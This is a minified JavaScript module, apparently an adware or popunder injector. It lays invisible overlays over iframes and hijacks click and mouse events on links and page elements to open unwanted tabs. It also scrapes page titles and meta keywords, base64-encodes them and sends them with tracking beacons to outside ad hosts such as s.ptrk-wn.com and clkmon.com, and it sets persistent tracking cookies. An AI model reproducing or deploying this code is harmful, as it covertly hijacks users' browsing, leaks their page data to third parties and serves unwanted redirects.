_GPL.j(function(f,d,da,C,m,e,E,sa,ta,gb,ea,x,Sa,fa,y,hb,p,ua,U,va,z,t,wa,ib,u,Ta,ga){function Q(){xa(k,U,Q);Ua(function(a,b){h=a;V||(V=!0,Va(),Wa(),ha(),ya(k,U,ha),za=fa(function(){36E5<+new m-Aa&&W(!1)},5E3))})}function ha(){Aa=+new m}function W(a){V&&(f("iframe").off("mouseover",Ba),K.remove(),V=!1,da(za),Xa(),xa(k,U,ha),a||ya(k,U,Q),y(Q,1E3*Math.max(n,l)))}function ya(a,b,c){if(p[ua])a[ua](b,c,!1);else a.attachEvent("on"+b,c)}function Wa(){ia=!0;f(X).children().add("body,a").add(p).on(L,Y);f("iframe").each(function(a,
b){try{f(b.contentWindow).on(L,Y)}catch(c){}});Ca=fa(function(){f("iframe").each(function(a,b){b[Da]||(b[Da]=1,f(b).mouseover(Ba))})},100);if(R)try{d.log("Attempting to pop from extension to: "+h);var a="ld893_"+(F?"_"+e(F)+"_":"")+"_"+A(),b=d.proto+d.baseCDN+"/pwn.html?u="+e(h)+"&n="+a+"&r=";"h"!=R||M?"w"!=R||M||(M=!0,ja(p,"openThatTabBitch",{url:b,isUnder:!1,attr:"z7b85_91c4"}),y(function(){M=!1},100)):(M=!0,ja(k,"createNewTab",{url:b,focused:"true"}),ja(k.documentElement,"createNewTab",{url:b,
focused:"true"}),y(function(){M=!1},100));var c=fa(function(){k.documentElement.getAttribute("z7b85_91c4")&&(da(c),W(!0),Ea(),k.documentElement.removeAttribute("z7b85_91c4"))},50)}catch(Ya){}}function ja(a,b,c){if(k.createEvent){var d=k.createEvent("CustomEvent");d.initCustomEvent(b,!1,!1,c);a.dispatchEvent(d)}else d=k.createEventObject(),d.detail=c,d.realType=b,a.fireEvent("ondataavailable",d)}function G(a){a=ea.userAgent.match(Sa(a+"[/ ](\\d+)","i"));return(a&&a[1])|0}function Za(){if(G("Chrome")){for(var a=
0;a<ea.plugins.length;a++)if("Widevine Content Decryption Module"==ea.plugins[a].name)return!1;return!0}return!1}function Va(){K||(K=f('<div style="z-index:999999999999999;cursor:pointer;display:none;position:absolute;background:transparent;">&nbsp;</div>').appendTo("body"),K.mouseout(function(){K.hide()}))}function Ba(a){var b=f(a.target),c=b.offset();c.width=b.outerWidth();c.height=b.outerHeight();c.display="block";K.css(c);a.stopPropagation()}function $a(a){if(h!=Fa){a=a.target||a.srcElement;for(var b=
"";a;){N||(N=a.tagName);if("A"==a.tagName&&a.href&&a.protocol.toLowerCase().match(/^http/)){b=a.protocol+"//"+a.host+a.pathname+a.search+a.hash;break}a=a.parentNode}b&&(h+="&t="+e(b.substring(0,Math.max(0,1500-h.length))));h+="&rt="+(+new m-Ga);N&&(h+="&data_tag="+e(N));"/"!=E.pathname&&(h+="&mk="+e(d.B64.encode(ka().substring(0,Math.max(0,1500-h.length)))))}d.log("Popping to: "+h);a="ld893_"+(F?"_"+e(F)+"_":"")+"_"+A();if(b=p.open("","_blank"))b.name=a,b.location.href=h;return b}function ka(){function a(a){return a.toLowerCase().replace(/[.,!?]/g,
" ").split(" ")}var b=[];f("title").length&&(b=b.concat(a(f("title").text())));f('meta[property="og:title"],meta[property="og:description"],meta[name="description"],meta[name="keywords"]').each(function(){var c=f.trim(f(this).attr("content"));c&&c.match(/^\s*[a-zA-Z0-9]/)&&(b=b.concat(a(c)))});return f.trim(function(a){var b=[];f.each(a,function(a,c){-1==f.inArray(c,b)&&b.push(c)});return b}(b).join(",").replace(/([,]+)/g,",").replace(/\s+/g," "))}function Ha(){var a=E.href.substr(0,1500),b="/"!=
E.pathname?ka():"",a=a.replace(/:/g,"%3A"),b=b.replace(/:/g,"%3A").substring(0,Math.max(0,1500-a.length)),c=d.getSubId?"&subid="+d.getSubId("z7b85"):"",a=e(d.B64.encode(a+"::z-"+B+"-"+la+"::"+b)),b="&cb="+ma,b=b+("&data_fr="+(Ia(v)?"false":"true"));return d.proto+Ja+"/pops?c="+a+"&a=1&ch="+e(S)+c+b}function xa(a,b,c){if(p[va])a[va](b,c,!1);else a.detachEvent("on"+b,c)}function Xa(){ia=!1;f(X).children().add("body,a").add(p).off(L,Y);f("iframe").each(function(a,b){try{f(b.contentWindow).off(L,Y)}catch(c){}});
da(Ca)}function ab(a){a=a||p.event||{};if(R&&k.documentElement.getAttribute("z7b85_91c4"))return!0;for(a=a.target||a.srcElement;a;){if(a["91c4"])return!0;a=a.parentNode}return!1}function O(a,b){a=x(a,10);isNaN(a)&&(a=x(Z&&Z.getItem(b)||d.gc(b,10),10)||0);return a}function Ia(a){return(new m(1E3*(a||0))).toDateString()==(new m).toDateString()}function T(){v|=0;q|=0;H|=0;var a=A(),b=q&&!Ia(v);b&&(q=0,r.set(u,q));var c=!I||a-v>=n&&q<I,a=a-H>=l;return!w&&b||c&&a}function Y(a){if(!ab(a)){if(g&&-1<g.indexOf("20150227_t")){var b=
a.target||a.srcElement,b=(b&&b.tagName||"").toUpperCase();-1<["AREA","FONT","STRONG","A","H2"].indexOf(b)?(n=s("awesome"),l=s("awesome")):-1<"SPAN LABEL B H3 LI IMG".split(" ").indexOf(b)?(n=s("good"),l=s("good")):(n=s("bad"),l=s("bad"));b=T();n=s("awesome");l=s("awesome");if(!b)return}var c=(b=ia&&bb())&&$a(a);if(b&&"mousedown"==a.type&&Ka)try{a.target.click()}catch(Ya){}c&&!c.closed?(W(!0),Ea(),(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popsuccess&u="+e(h)+"&cid="+d.vars.cid+"&pid="+B+"&r="+
999999999*Math.random(),aa&&C(aa),ba&&C(ba)):c&&c.closed?ba||(ba=y(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popclose&u="+e(h)+"&location="+e(E.hostname)+"&pid="+B+"&tag="+e(N||"")+"&r="+999999999*Math.random()},1E3)):b&&(aa||(aa=y(function(){(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfail&u="+e(h)+"&location="+e(E.hostname)+"&pid="+B+"&tag="+e(N||"")+"&r="+999999999*Math.random()},1E3)))}}function bb(){if(!r.swf)return!0;v=O(r.get(z),z);316808>La.score&&(q=O(r.get(u),
u));var a=Ma(r.get(t));H=O(a[P],t);return T()}function A(){return sa(new m/1E3)}function Na(a,b,c){r.set(a,c);c=A();Z&&Z.setItem(a,c);b=x(b,10);var d=new m;d.setSeconds(d.getSeconds()+b);k.cookie=a+"="+c+";expires="+d.toUTCString()+";path=/;domain="+P}function Ea(){var a=A();Na(z,n,a);r.set(Ta,a);v=a;r.set(u,++q);l&&Na(t,l,ca+(ca&&",")+P+":"+a)}function Ma(a){var b={},c=A(),d=[];a=(a||"").split(",");if(a.length){for(var g=0;g<a.length;++g){var e=a[g].split(":"),f=x(e[1],10);c-f<l&&(b[e[0]]=f,d.push(e[0]+
":"+f))}ca=d.join(",");r.set(t,ca)}return b}function na(){return T()||w?1:A()-(x(H,10)||0)<l?Infinity:q>=I?"US"==d.vars.cid?149058:-1<["CA","GB","AU","FR","IT"].indexOf(d.vars.cid)?88620:59858:"US"==d.vars.cid?47432:-1<["CA","GB","AU","FR","IT"].indexOf(d.vars.cid)?59858:49928}function cb(a){"US"==d.vars.cid?oa(a,47432,149058):-1<["CA","GB","AU","FR","IT"].indexOf(d.vars.cid)?oa(a,59858,88620):oa(a,49928,59858);return T()}function oa(a,b,c){a>=b&&(n=0,a>=c&&q>=I&&(q=ta(0,I-1)))}function Oa(){C(pa);
if(!w&&1735!=B){var a=na(),b="http://clkmon.com/adServe/banners?pid=14442&cid="+la+"&action=r&q=",c="/"!=E.pathname?ka():"",b=b+e(c.substring(0,Math.max(0,1500-b.length)));p[ma]({url:b,score:a});(new Image).src="//cdnstats-a.akamaihd.net/s.gif?t=popfallback&u="+e(E.hostname)+"&r="+999999999*Math.random()}}function s(a){return"20150227_t_136"==g?{awesome:60,good:180,bad:360}[a]:"20150227_t_246"==g?{awesome:120,good:240,bad:360}[a]:"20150227_t_2610"==g?{awesome:120,good:360,bad:600}[a]:"20150227_t_369"==
g?{awesome:180,good:360,bad:540}[a]:"20150227_t_3710"==g?{awesome:180,good:420,bad:600}[a]:"20150227_t_1inf"==g?{awesome:60,good:86400,bad:86400}[a]:{awesome:360,good:360,bad:360}[a]}function Ua(a){!function c(){d.gc(wa)||r.get(["frt","_GPL_oo_z7b85",z,t,u,ga],function(e){if(e.v.frt){if("1750"==B){var f=x(e.v._GPL_oo_z7b85,10)||0;if(86400>sa(new m/1E3)-f)return}X.getAttribute("data-openThatTabBitch")&&"t3"==d.vars.wptg&&(g="wp_t3",R="w",0.2>Math.random()&&(la=23970723,B=99998));!g&&(f="20150227_c 20150227_c 20150227_c 20150227_c 20150227_c 20150227_c 20150227_c 20150227_c 20150227_t 20150227_t".split(" "),
g=e.v[ga],!g||-1==f.indexOf(g)&&-1==g.indexOf("20150227_t"))&&(g=f[Math.floor(Math.random()*f.length)],"20150227_t"==g&&(g="20150227_t_136 20150227_t_246 20150227_t_2610 20150227_t_369 20150227_t_3710 20150227_t_1inf".split(" ")[Math.floor(6*Math.random())]),r.set(ga,g));g&&-1<g.indexOf("20150227_t")&&(n=s("awesome"),l=s("awesome"));p[ma]=function(c){db(c,a)};f=A();v=O(e.v[z],z);q=O(e.v[u],u);e=Ma(e.v[t]);H=O(e[P],t);if(T()){e=na();qa=+new m;var h=k.createElement("script");h.src=Ha()+"&ms="+e+"&r="+
f;h.onerror=Oa;X.appendChild(h);pa=y(Oa,15E3)}else e=na(),d.log("minScoreNeeded: "+e),Infinity>e&&!Pa&&!w&&(qa=+new m,d.insertJS(Ha()+"&ms="+e+"&r="+f),Pa=!0),C(ra),ra=y(c,1E3*(5+ta(f,v+n,H+l)-f))}})}()}function db(a,b){C(pa);var c=+new m-qa;F="";a&&(a.cid&&(F=a.cid,a.url||(a.url=d.proto+Ja+"/click?c="+e(F),a.url+=d.getSubId?"&subid="+d.getSubId("z7b85"):"",a.url+=g?"&data_test="+e(g):"",a.url+="&data_fb="+(Za()?"yes":"no"),a.url+="&data_rtt="+c,a.url+="&data_ss="+(screen.availHeight||0)+"x"+(screen.availWidth||
0))),w&&!a.cid&&(a.url=Fa,a.cid="xr"),c=x(a.score,10),w||0<c&&cb(c))&&(Ga=+new m,C(ra),a.url&&a.expires&&(C(Qa),Qa=y(function(){W(!0);Q()},1E3*x(a.expires,10))),La={score:c,now:new m/1},b(a.url,c))}var r=d.items.e6a00,k=p.document,X=k.body,Z=p.localStorage,Ka=G("chrome"),eb=G("firefox");G("opera");var fb=G("safari");G("webkit");var S=d.item_vars["22555_ch"]||d.item_vars.ch||"",n,v,H,J=d.dt(),J=J&&J.inherited&&J.inherited.t||[],w="x"==S||-1<J.indexOf("adult")||0==J.length&&0<f('meta[content="RTA-5042-1996-1400-1577-RTA"]').length;
w&&(-1==J.indexOf("adult_block")?S="x":(S="x-issue",w=!1));var l,Ja="s.ptrk-wn.com",V=!1,za,Aa,ia=!1,P=d.gd(),h,Ga=0,qa=0,Qa,ca="",q=0,I,La={},F="",ra,Pa=!1,g,aa,ba,pa,N,L="click";if(Ka||fb)L="mousedown";else if(eb||k.all||G("trident"))L="mouseup";var Ra=d.zoneid("z7b85",!0).split("_"),la=Ra[0],B=Ra[1]||d.vars.pid,Fa="http://secure.xsrving.com/display?size=800x600&ch="+e(S)+"&referer="+e(P),R=!1,M=!1,ma=d.rs(20),K,Da=d.rs(12),Ca;d.canLoad("ld893")||d.gc(wa)||(p.name||"").match(/^a652c_/)||1797==B&&
"GB"==d.vars.cid||"facebook.com"==P||(w?(I=n=0,l=180,z+="_xr",t+="_xr",u+="_xr"):(n=360,I=4,l=360,"t1"==d.vars.wptg&&(g="wp_t1",l=n=180)),Q())},_GPL,clearInterval,clearTimeout,Date,encodeURIComponent,location,Math.floor,Math.max,Math.random,navigator,parseInt,RegExp,setInterval,setTimeout,void 0,window,"addEventListener","mousemove","removeEventListener","ld893_pop_g","ld893_pop_s","z7b85_bl1","ld893_s","ld893_pop_gs","ld893_spopd","z7b85_test");
